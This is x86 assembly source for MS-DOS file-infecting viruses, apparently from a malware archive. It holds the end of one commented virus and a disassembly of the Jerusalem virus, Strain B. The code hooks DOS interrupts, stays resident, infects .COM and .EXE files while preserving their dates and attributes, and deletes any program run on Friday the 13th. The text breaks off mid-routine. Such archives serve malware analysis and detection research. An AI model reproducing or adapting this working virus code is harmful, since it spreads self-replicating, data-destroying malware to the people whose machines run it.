MOV MEM_SW,0 ; Set off memory allocated switch
MOV FPTHOF,DX ; Save pathname offset
MOV FPTHSG,DS ; Save pathname segment
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CLD
MOV DI,DX ; Point to file pathname
XOR DL,DL ; Default drive
CMP BYTE PTR [DI+1],3AH ; Test second character for ':'
JNZ BP0220 ; Branch if not
MOV DL,[DI] ; Get drive letter
AND DL,1FH ; Convert to number
BP0220:
MOV AH,36H ; Get disk free space
INT 21H ; DOS service (Get disk free)
CMP AX,-1 ; Test for invalid drive
JNZ BP0240 ; Branch if not
BP0230:
JMP BP0500 ; Terminate
BP0240:
MUL BX ; Calc number of free sectors
MUL CX ; Calc number of free bytes
OR DX,DX ; Test high word of result
JNZ BP0250 ; Branch if not zero
CMP AX,OFFSET ENDADR ; Length of virus
JB BP0230 ; Terminate if less
BP0250:
MOV DX,FPTHOF ; Get pathname offset
PUSH DS ; \ Set ES to DS
POP ES ; /
XOR AL,AL ; Test character - zero
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
MOV SI,FPTHOF ; Get pathname offset
BP0260:
MOV AL,[SI] ; Get pathname character
OR AL,AL ; Test for a character
JZ BP0280 ; Finish if none
CMP AL,61H ; Test for 'a'
JB BP0270 ; Branch if less
CMP AL,7AH ; Test for 'z'
JA BP0270 ; Branch if above
SUB BYTE PTR [SI],20H ; Convert to uppercase
BP0270:
INC SI ; Address next character
JMP BP0260 ; Process next character
BP0280:
MOV CX,0BH ; Load length 11
SUB SI,CX ; Address back by length
MOV DI,OFFSET COM_CM ; 'COMMAND.COM'
PUSH CS ; \ Set ES to CS
POP ES ; /
MOV CX,0BH ; Load length again
REPZ CMPSB ; Compare
JNZ BP0290 ; Continue if not command.com
JMP BP0500 ; Terminate
BP0290:
MOV AX,4300H ; Get file attributes
INT 21H ; DOS service (Get attributes)
JB BP0300 ; Follow chain of error branches
MOV F_ATTS,CX ; Save file attributes
BP0300:
JB BP0320 ; Follow chain of error branches
XOR AL,AL ; Scan character - zero
MOV EXE_SW,AL ; Set EXE switch off
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV DI,DX ; Pointer to pathname
MOV CX,41H ; Maximum pathname length
REPNZ SCASB ; Find end of pathname
CMP BYTE PTR [DI-2],4DH ; Is last letter 'M'
JZ BP0310 ; Branch if yes
CMP BYTE PTR [DI-2],6DH ; Is last letter 'm'
JZ BP0310 ; Branch if yes
INC EXE_SW ; Set EXE switch on
BP0310:
MOV AX,3D00H ; Open handle, read only
INT 21H ; DOS service (Open handle)
BP0320:
JB BP0340 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV BX,AX ; File handle
MOV AX,4202H ; Move file pointer
MOV CX,-1 ; \ End of file minus 5
MOV DX,-5 ; /
INT 21H ; DOS service (Move pointer)
JB BP0320 ; Follow chain of error branches
ADD AX,5 ; Total file size
MOV F_SIZE,AX ; Save total file size
MOV CX,5 ; Length to read
MOV DX,OFFSET SIGBUF ; Infection test buffer
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
MOV DI,DX ; Address test buffer
MOV SI,OFFSET VR_SIG ; Signature
REPZ CMPSB ; Compare signatures
JNZ BP0330 ; Branch if not infected
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
JMP BP0500 ; Terminate
BP0330:
MOV AX,3524H ; Get interrupt 24H
INT 21H ; DOS service (Get int)
MOV I24OFF,BX ; Save interrupt 24H offset
MOV I24SEG,ES ; Save interrupt 24H segment
MOV DX,OFFSET BP0090 ; Interrupt 24H routine
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
LDS DX,F_PATH ; Address program pathname
XOR CX,CX ; No attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
ASSUME DS:NOTHING
BP0340:
JB BP0350 ; Follow chain of error branches
MOV BX,F_HAND ; Get file handle
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
MOV F_HAND,-1 ; No file handle
MOV AX,3D02H ; Open handle read/write
INT 21H ; DOS service (Open handle)
JB BP0350 ; Follow chain of error branches
MOV F_HAND,AX ; Save file handle
MOV AX,CS ; \
MOV DS,AX ; ) Make DS & ES same as CS
MOV ES,AX ; /
ASSUME DS:CODE
MOV BX,F_HAND ; Get file handle
MOV AX,5700H ; Get file date and time
INT 21H ; DOS service (Get file date)
MOV F_DATE,DX ; Save file date
MOV F_TIME,CX ; Save file time
MOV AX,4200H ; Move file pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
INT 21H ; DOS service (Move pointer)
BP0350:
JB BP0380 ; Follow chain of error branches
CMP EXE_SW,0 ; Test EXE switch
JZ BP0360 ; Branch if off
JMP BP0400
; .COM file processing
BP0360:
MOV BX,1000H ; 64K of memory wanted
MOV AH,48H ; Allocate memory
INT 21H ; DOS service (Allocate memory)
JNB BP0370 ; Branch if successful
MOV AH,3EH ; Close handle
MOV BX,F_HAND ; Get file handle
INT 21H ; DOS service (Close handle)
JMP BP0500 ; Terminate
BP0370:
INC MEM_SW ; Set on memory allocated switch
MOV ES,AX ; Segment of allocated memory
XOR SI,SI ; Start of virus
MOV DI,SI ; Start of allocated memory
MOV CX,OFFSET ENDADR ; Length of virus
REPZ MOVSB ; Copy virus to allocated
MOV DX,DI ; Address after virus
MOV CX,F_SIZE ; Total file size
MOV BX,F_HAND ; Get file handle
PUSH ES ; \ Set DS to ES
POP DS ; /
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0380:
JB BP0390 ; Follow chain of error branches
ADD DI,CX ; Add previous file size
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
MOV SI,OFFSET VR_SIG ; Signature
MOV CX,5 ; Length to move
REPZ MOVS [DI],CS:VR_SIG ; Copy signature to end
MOV CX,DI ; Length to write
XOR DX,DX ; Start of allocated
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0390:
JB BP0410 ; Follow chain of error branches
JMP BP0480 ; Free memory and reset values
; .EXE file processing
BP0400:
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,3FH ; Read handle
INT 21H ; DOS service (Read handle)
BP0410:
JB BP0430 ; Follow chain of error branches
MOV EXHD09,1984H ; Negative checksum
MOV AX,EXHD07 ; \ Store initial stack segment
MOV PRG_SS,AX ; /
MOV AX,EXHD08 ; \ Store initial stack pointer
MOV PRG_SP,AX ; /
MOV AX,EXHD10 ; \ Store initial code offset
MOV PRGOFF,AX ; /
MOV AX,EXHD11 ; \ Store initial code segment
MOV PRGSEG,AX ; /
MOV AX,EXHD02 ; Get size of file in pages
CMP EXHD01,0 ; Number of bytes in last page
JZ BP0420 ; Branch if none
DEC AX ; One less page
BP0420:
MUL BYTSEC ; Bytes per sector
ADD AX,EXHD01 ; \ Add bytes in last page
ADC DX,0 ; /
ADD AX,0FH ; \ Round up
ADC DX,0 ; /
AND AX,0FFF0H ; Clear bottom figure
MOV F_SIZ1,AX ; Save low-order file size
MOV F_SIZ2,DX ; Save high-order file size
ADD AX,OFFSET ENDADR ; \ Add virus length
ADC DX,0 ; /
BP0430:
JB BP0450 ; Follow chain of error branches
DIV BYTSEC ; Bytes per sector
OR DX,DX ; Test odd bytes
JZ BP0440 ; Branch if none
INC AX ; One more page for odd bytes
BP0440:
MOV EXHD02,AX ; Store size of file in pages
MOV EXHD01,DX ; Store bytes in last page
MOV AX,F_SIZ1 ; Low-order file size
MOV DX,F_SIZ2 ; High-order file size
DIV PARAGR ; Size of a paragraph
SUB AX,EXHD04 ; Size of header in paragraphs
MOV EXHD11,AX ; Initial code segment
MOV EXHD10,OFFSET BP0030 ; Initial code offset
MOV EXHD07,AX ; Initial stack segment
MOV EXHD08,OFFSET ENDADR ; Initial stack pointer
XOR CX,CX ; \ Beginning of file
MOV DX,CX ; /
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0450:
JB BP0460 ; Follow chain of error branches
MOV CX,1CH ; Length of EXE header
MOV DX,OFFSET EXEHED ; .EXE header store
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
BP0460:
JB BP0470 ; Follow chain of error branches
CMP AX,CX ; Has same length been written
JNZ BP0480 ; Branch if not
MOV DX,F_SIZ1 ; Low-order file size
MOV CX,F_SIZ2 ; High-order file size
MOV AX,4200H ; Move file pointer
INT 21H ; DOS service (Move pointer)
BP0470:
JB BP0480 ; Follow chain of error branches
XOR DX,DX ; Address beginning of virus
MOV CX,OFFSET ENDADR ; Length of virus
MOV AH,40H ; Write handle
INT 21H ; DOS service (Write handle)
ASSUME DS:NOTHING
BP0480:
CMP MEM_SW,0 ; Test memory allocated switch
JZ BP0490 ; Branch if off
MOV AH,49H ; Free allocated memory
INT 21H ; DOS service (Free memory)
BP0490:
CMP F_HAND,-1 ; Test file handle
JZ BP0500 ; Terminate if none
MOV BX,F_HAND ; Get file handle
MOV DX,F_DATE ; Get file date
MOV CX,F_TIME ; Get file time
MOV AX,5701H ; Set file date and time
INT 21H ; DOS service (Set file date)
MOV AH,3EH ; Close handle
INT 21H ; DOS service (Close handle)
LDS DX,F_PATH ; Address program pathname
MOV CX,F_ATTS ; Load file attributes
MOV AX,4301H ; Set file attributes
INT 21H ; DOS service (Set attributes)
LDS DX,INT_24 ; Original interrupt 24H address
MOV AX,2524H ; Set interrupt 24H
INT 21H ; DOS service (Set int)
BP0500:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
JMP INT_21 ; Interrupt 21H
DB 11 DUP (0)
ENDKEEP EQU $
; Stack area - rubbish
DB 04DH, 09BH, 018H, 004H, 000H, 000H, 000H, 000H
DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
DB 000H, 001H, 000H, 000H, 000H, 000H, 000H, 032H
DB 000H, 000H, 000H, 02FH, 000H, 0FFH, 0FFH, 0FFH
DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH
DB 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 0FFH, 043H
DB 03AH, 05CH, 041H, 055H, 054H, 04FH, 045H, 058H
DB 045H, 043H, 02EH, 042H, 041H, 054H, 000H, 061H
DB 075H, 074H, 06FH, 065H, 078H, 065H, 063H, 00DH
DB 000H, 0FFH, 0FFH, 0FFH, 000H, 000H, 000H, 000H
DB 04DH, 09BH, 018H, 000H, 010H, 09AH, 0F0H, 0FEH
DB 01DH, 0F0H, 02FH, 001H, 09BH, 018H, 03CH, 001H
DB 0E9H, 092H, 000H, 073H, 055H, 04DH, 073H, 044H
DB 06FH, 073H, 000H, 001H, 026H, 01CH, 000H, 000H
DB 000H, 074H, 02AH, 0ABH, 000H, 0CDH, 017H, 060H
DB 014H, 09FH, 002H, 056H, 005H, 09BH, 018H, 053H
DB 03AH, 000H, 000H, 000H, 000H, 000H, 000H, 000H
DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H
DB 000H, 0B5H, 01BH, 080H, 000H, 000H, 000H, 080H
DB 000H, 0B5H, 01BH, 05CH, 000H, 0B5H, 01BH, 06CH
DB 000H, 0B5H, 01BH, 010H, 007H, 0EDH, 014H, 0C5H
DB 000H, 0EDH, 014H, 046H, 002H, 0A1H, 000H, 04DH
DB 05AH, 0F0H, 000H, 0B2H, 000H, 038H, 001H, 060H
DB 000H, 0D3H, 006H, 0FFH, 0FFH, 05EH, 015H, 010H
DB 007H, 084H, 019H, 0C5H, 000H, 05EH, 015H, 01EH
DB 000H, 000H, 000H, 037H, 020H, 02AH, 02AH, 02AH
DB 005H, 000H, 020H, 000H, 030H, 00FH, 000H, 060H
DB 000H, 002H, 010H, 000H, 0E0H, 05BH, 001H, 000H
DB 0B9H, 041H, 02AH, 09BH, 043H, 04FH, 04DH, 04DH
DB 041H, 04EH, 044H, 02EH, 043H, 04FH, 04DH, 001H
DB 000H, 000H, 000H, 000H, 000H, 0FCH, 0B4H, 0E0H
DB 0CDH, 021H, 080H, 0FCH, 0E0H, 073H, 016H, 080H
DB 0FCH, 003H, 072H, 011H, 0B4H, 0DDH, 0BFH, 000H
DB 001H, 0BEH, 010H, 007H, 003H, 0F7H, 02EH, 08BH
ENDADR EQU $
CODE ENDS
END START
MSDOS/J-Index/Virus.MSDOS.Unknown.jerusal.asm
+720
View File
@@ -0,0 +1,720 @@
PAGE 59,132
;*****************************************************************************
; Jerusalem Virus - Strain B
;
; Disassembled and commented by:
;
; - Captain Morgan -
;*****************************************************************************
.286c
data_1e equ 2Ch
data_2e equ 43h
data_3e equ 45h
data_4e equ 47h
data_5e equ 49h
data_6e equ 51h
data_7e equ 53h
data_8e equ 57h
data_9e equ 5Dh
data_10e equ 5Fh
data_11e equ 61h
data_12e equ 63h
data_13e equ 65h
data_14e equ 78h
data_15e equ 7Ah
data_16e equ 7Ch
data_17e equ 7Eh
data_18e equ 0Ah
data_19e equ 0Ch
data_20e equ 0Eh
data_21e equ 0Fh
data_22e equ 11h
data_23e equ 13h
data_24e equ 15h
data_25e equ 17h
data_26e equ 19h
data_27e equ 1Bh
data_28e equ 1Dh
data_29e equ 1Fh
data_30e equ 29h
data_31e equ 2Bh
data_32e equ 2Dh
data_33e equ 2Fh
data_34e equ 31h
data_35e equ 33h
data_36e equ 4Eh
data_37e equ 70h
data_38e equ 72h
data_39e equ 74h
data_40e equ 76h
data_41e equ 7Ah
data_42e equ 80h
data_43e equ 82h
data_44e equ 8Fh
seg_a segment
assume cs:seg_a, ds:seg_a
org 100h
je proc far
start:
jmp loc_2 ; (0195)
db 73h, 55h, 4Dh, 73h, 44h, 6Fh
db 73h, 0, 1, 0EBh, 21h, 0
db 0, 0, 0ABh, 0Bh, 2Ch, 2
db 70h, 0, 92h, 0Eh, 29h, 1Ah
db 0EBh, 4, 59h, 6Fh, 0A8h
db 7Bh
db 13 dup (0)
db 0E8h, 6, 0D7h, 62h, 21h, 80h
db 0, 0, 0, 80h, 0, 62h
db 21h, 5Ch, 0, 62h, 21h, 6Ch
db 0, 62h, 21h, 10h, 7, 60h
db 5Bh, 0C5h, 0, 60h, 5Bh, 0
db 0F0h, 6, 0, 4Dh, 5Ah, 30h
db 0, 53h, 0, 1Fh, 0, 20h
db 0, 0, 0, 0FFh, 0FFh, 0B2h
db 9, 10h, 7, 84h, 19h, 0C5h
db 0, 0B2h, 9, 20h, 0, 0
db 0, 2Eh, 0Dh, 0Ah, 0, 0
db 5, 0, 20h, 0, 26h, 12h
db 46h, 0A3h, 0, 2, 10h, 0
db 20h, 9Dh, 0, 0, 7Bh, 3Dh
db 2Eh, 9Bh
db 'COMMAND.COM'
db 1, 0, 0, 0, 0, 0
loc_2:
cld ; Clear direction
mov ah,0E0h
int 21h ; DOS Services ah=function E0h
cmp ah,0E0h
jae loc_3 ; Jump if above or =
cmp ah,3
jb loc_3 ; Jump if below
mov ah,0DDh
mov di,100h
mov si,710h
add si,di
mov cx,cs:[di+11h]
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function DDh
loc_3:
mov ax,cs
add ax,10h
mov ss,ax
mov sp,700h
loc_4:
push ax
mov ax,0C5h
push ax
retf ; Return far
db 0FCh, 6, 2Eh, 8Ch, 6, 31h
db 0, 2Eh, 8Ch, 6, 39h, 0
db 2Eh, 8Ch, 6, 3Dh, 0, 2Eh
db 8Ch, 6, 41h, 0, 8Ch, 0C0h
db 5, 10h, 0, 2Eh, 1, 6
db 49h, 0, 2Eh, 1, 6, 45h
db 0, 0B4h, 0E0h, 0CDh, 21h, 80h
db 0FCh, 0E0h, 73h, 13h, 80h, 0FCh
db 3, 7, 2Eh, 8Eh, 16h, 45h
db 0, 2Eh, 8Bh, 26h, 43h, 0
db 2Eh, 0FFh, 2Eh, 47h, 0, 33h
db 0C0h, 8Eh, 0C0h, 26h, 0A1h, 0FCh
db 3, 2Eh, 0A3h, 4Bh, 0, 26h
db 0A0h, 0FEh, 3, 2Eh, 0A2h, 4Dh
db 0
db 26h
je endp
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;
; External Entry Point
;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
int_24h_entry proc far
mov word ptr ds:[3FCh],0A5F3h
mov byte ptr es:data_47,0CBh
pop ax
add ax,10h
mov es,ax
push cs
pop ds
mov cx,710h
shr cx,1 ; Shift w/zeros fill
xor si,si ; Zero register
mov di,si
push es
mov ax,142h
push ax
;* jmp far ptr loc_1 ;*(0000:03FC)
db 0EAh, 0FCh, 3, 0, 0
db 8Ch, 0C8h, 8Eh, 0D0h, 0BCh, 0
db 7, 33h, 0C0h, 8Eh, 0D8h, 2Eh
db 0A1h, 4Bh, 0, 0A3h, 0FCh, 3
db 2Eh, 0A0h, 4Dh, 0, 0A2h, 0FEh
db 3
int_24h_entry endp
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;
; External Entry Point
;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
int_21h_entry proc far
mov bx,sp
mov cl,4
shr bx,cl ; Shift w/zeros fill
add bx,10h
mov cs:data_35e,bx
mov ah,4Ah ; 'J'
mov es,cs:data_34e
int 21h ; DOS Services ah=function 4Ah
; change mem allocation, bx=siz
mov ax,3521h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov cs:data_25e,bx
mov cs:data_26e,es
push cs
pop ds
mov dx,25Bh
mov ax,2521h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov es,ds:data_34e
mov es,es:data_1e
xor di,di ; Zero register
mov cx,7FFFh
xor al,al ; Zero register
locloop_5:
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
cmp es:[di],al
loopnz locloop_5 ; Loop if zf=0, cx>0
mov dx,di
add dx,3
mov ax,4B00h
push es
pop ds
push cs
pop es
mov bx,35h
push ds
push es
push ax
push bx
push cx
push dx
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
mov byte ptr cs:data_20e,0
cmp cx,7C3h
je loc_7 ; Jump if equal
cmp al,5 ; Check to see if it's Friday
jne loc_6 ; Jump if not equal
cmp dl,0Dh ; Check to see if it's the 13th
jne loc_6 ; Jump if not equal
inc byte ptr cs:data_20e
jmp short loc_7 ; (02F7)
db 90h
loc_6:
mov ax,3508h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov cs:data_23e,bx
mov cs:data_24e,es
push cs
pop ds
mov word ptr ds:data_29e,7E90h
mov ax,2508h
mov dx,21Eh
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
loc_7:
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
pushf ; Push flags
call dword ptr cs:data_25e
push ds
pop es
mov ah,49h ; 'I'
int 21h ; DOS Services ah=function 49h
; release memory block, es=seg
mov ah,4Dh ; 'M'
int 21h ; DOS Services ah=function 4Dh
; get return code info in ax
mov ah,31h ; '1'
mov dx,600h
mov cl,4
shr dx,cl ; Shift w/zeros fill
add dx,10h
int 21h ; DOS Services ah=function 31h
; terminate & stay resident
db 32h, 0C0h, 0CFh, 2Eh, 83h, 3Eh
db 1Fh, 0, 2, 75h, 17h, 50h
db 53h, 51h, 52h, 55h, 0B8h, 2
db 6, 0B7h, 87h, 0B9h, 5, 5
db 0BAh, 10h, 10h, 0CDh, 10h, 5Dh
db 5Ah, 59h, 5Bh, 58h, 2Eh, 0FFh
db 0Eh, 1Fh, 0, 75h, 12h, 2Eh
db 0C7h, 6, 1Fh, 0, 1, 0
db 50h, 51h, 56h, 0B9h, 1, 40h
db 0F3h, 0ACh
db 5Eh, 59h, 58h
loc_8:
jmp dword ptr cs:data_23e
db 9Ch, 80h, 0FCh, 0E0h, 75h, 5
db 0B8h, 0, 3, 9Dh, 0CFh, 80h
db 0FCh, 0DDh, 74h, 13h, 80h, 0FCh
db 0DEh, 74h, 28h, 3Dh, 0, 4Bh
db 75h, 3, 0E9h, 0B4h, 0
loc_9:
popf ; Pop flags
jmp dword ptr cs:data_25e
loc_10:
pop ax
pop ax
mov ax,100h
mov cs:data_18e,ax
pop ax
mov cs:data_19e,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
popf ; Pop flags
mov ax,cs:data_21e
jmp dword ptr cs:data_18e
loc_11:
add sp,6
popf ; Pop flags
mov ax,cs
mov ss,ax
mov sp,710h
push es
push es
xor di,di ; Zero register
push cs
pop es
mov cx,10h
mov si,bx
mov di,21h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,ds
mov es,ax
mul word ptr cs:data_41e ; ax = data * ax
add ax,cs:data_31e
adc dx,0
div word ptr cs:data_41e ; ax,dxrem=dx:ax/data
mov ds,ax
mov si,dx
mov di,dx
mov bp,es
mov bx,cs:data_33e
or bx,bx ; Zero ?
jz loc_13 ; Jump if zero
loc_12:
mov cx,8000h
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
add ax,1000h
add bp,1000h
mov ds,ax
mov es,bp
dec bx
jnz loc_12 ; Jump if not zero
loc_13:
mov cx,cs:data_32e
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop ax
push ax
add ax,10h
add cs:data_30e,ax
data_47 db 2Eh
db 1, 6, 25h, 0, 2Eh, 0A1h
db 21h, 0, 1Fh, 7, 2Eh, 8Eh
db 16h, 29h, 0, 2Eh, 8Bh, 26h
db 27h, 0, 2Eh, 0FFh, 2Eh, 23h
db 0
loc_14:
xor cx,cx ; Zero register
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
mov ax,4B00h
popf ; Pop flags
jmp dword ptr cs:data_25e
loc_15:
cmp byte ptr cs:data_20e,1
je loc_14 ; Jump if equal
mov word ptr cs:data_37e,0FFFFh
mov word ptr cs:data_44e,0
mov cs:data_42e,dx
mov cs:data_43e,ds
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
cld ; Clear direction
mov di,dx
xor dl,dl ; Zero register
cmp byte ptr [di+1],3Ah ; ':'
jne loc_16 ; Jump if not equal
mov dl,[di]
and dl,1Fh
loc_16:
mov ah,36h ; '6'
int 21h ; DOS Services ah=function 36h
; get free space, drive dl,1=a:
cmp ax,0FFFFh
jne loc_18 ; Jump if not equal
loc_17:
jmp loc_44 ; (06E7)
loc_18:
mul bx ; dx:ax = reg * ax
mul cx ; dx:ax = reg * ax
or dx,dx ; Zero ?
jnz loc_19 ; Jump if not zero
cmp ax,710h
jb loc_17 ; Jump if below
loc_19:
mov dx,cs:data_42e
push ds
pop es
xor al,al ; Zero register
mov cx,41h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov si,cs:data_42e
loc_20:
mov al,[si]
or al,al ; Zero ?
jz loc_22 ; Jump if zero
cmp al,61h ; 'a'
jb loc_21 ; Jump if below
cmp al,7Ah ; 'z'
ja loc_21 ; Jump if above
sub byte ptr [si],20h ; ' '
loc_21:
inc si
jmp short loc_20 ; (0490)
loc_22:
mov cx,0Bh
sub si,cx
mov di,84h
push cs
pop es
mov cx,0Bh
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jnz loc_23 ; Jump if not zero
jmp loc_44 ; (06E7)
loc_23:
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
jc loc_24 ; Jump if carry Set
mov cs:data_38e,cx
loc_24:
jc loc_26 ; Jump if carry Set
xor al,al ; Zero register
mov cs:data_36e,al
push ds
pop es
mov di,dx
mov cx,41h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
cmp byte ptr [di-2],4Dh ; 'M'
je loc_25 ; Jump if equal
cmp byte ptr [di-2],6Dh ; 'm'
je loc_25 ; Jump if equal
inc byte ptr cs:data_36e
loc_25:
mov ax,3D00h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
loc_26:
jc loc_28 ; Jump if carry Set
mov cs:data_37e,ax
mov bx,ax
mov ax,4202h
mov cx,0FFFFh
mov dx,0FFFBh
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_26 ; Jump if carry Set
add ax,5
mov cs:data_22e,ax
mov cx,5
mov dx,6Bh
mov ax,cs
mov ds,ax
mov es,ax
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov di,dx
mov si,5
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jnz loc_27 ; Jump if not zero
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jmp loc_44 ; (06E7)
loc_27:
mov ax,3524h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ds:data_27e,bx
mov ds:data_28e,es
mov dx,21Bh
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
lds dx,dword ptr ds:data_42e ; Load 32 bit ptr
xor cx,cx ; Zero register
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_28:
jc loc_29 ; Jump if carry Set
mov bx,cs:data_37e
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov word ptr cs:data_37e,0FFFFh
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_29 ; Jump if carry Set
mov cs:data_37e,ax
mov ax,cs
mov ds,ax
mov es,ax
mov bx,ds:data_37e
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ds:data_39e,dx
mov ds:data_40e,cx
mov ax,4200h
xor cx,cx ; Zero register
mov dx,cx
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
loc_29:
jc loc_32 ; Jump if carry Set
cmp byte ptr ds:data_36e,0
je loc_30 ; Jump if equal
jmp short loc_34 ; (05E6)
db 90h
loc_30:
mov bx,1000h
mov ah,48h ; 'H'
int 21h ; DOS Services ah=function 48h
; allocate memory, bx=bytes/16
jnc loc_31 ; Jump if carry=0
mov ah,3Eh ; '>'
mov bx,ds:data_37e
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jmp loc_44 ; (06E7)
loc_31:
inc word ptr ds:data_44e
mov es,ax
xor si,si ; Zero register
mov di,si
mov cx,710h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov dx,di
mov cx,ds:data_22e
mov bx,ds:data_37e
push es
pop ds
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
loc_32:
jc loc_33 ; Jump if carry Set
add di,cx
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov si,5
mov cx,5
rep movs byte ptr es:[di],cs:[si] ; Rep when cx >0 Mov [si] to es:[di]
mov cx,di
xor dx,dx ; Zero register
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_33:
jc loc_35 ; Jump if carry Set
jmp loc_42 ; (06A2)
loc_34:
mov cx,1Ch
mov dx,4Fh
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
loc_35:
jc loc_37 ; Jump if carry Set
mov word ptr ds:data_11e,1984h
mov ax,ds:data_9e
mov ds:data_3e,ax
mov ax,ds:data_10e
mov ds:data_2e,ax
mov ax,ds:data_12e
mov ds:data_4e,ax
mov ax,ds:data_13e
mov ds:data_5e,ax
mov ax,ds:data_7e
cmp word ptr ds:data_6e,0
je loc_36 ; Jump if equal
dec ax
loc_36:
mul word ptr ds:data_14e ; ax = data * ax
add ax,ds:data_6e
adc dx,0
add ax,0Fh
adc dx,0
and ax,0FFF0h
mov ds:data_16e,ax
mov ds:data_17e,dx
add ax,710h
adc dx,0
loc_37:
jc loc_39 ; Jump if carry Set
div word ptr ds:data_14e ; ax,dxrem=dx:ax/data
or dx,dx ; Zero ?
jz loc_38 ; Jump if zero
inc ax
loc_38:
mov ds:data_7e,ax
mov ds:data_6e,dx
mov ax,ds:data_16e
mov dx,ds:data_17e
div word ptr ds:data_15e ; ax,dxrem=dx:ax/data
sub ax,ds:data_8e
mov ds:data_13e,ax
mov word ptr ds:data_12e,0C5h
mov ds:data_9e,ax
mov word ptr ds:data_10e,710h
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
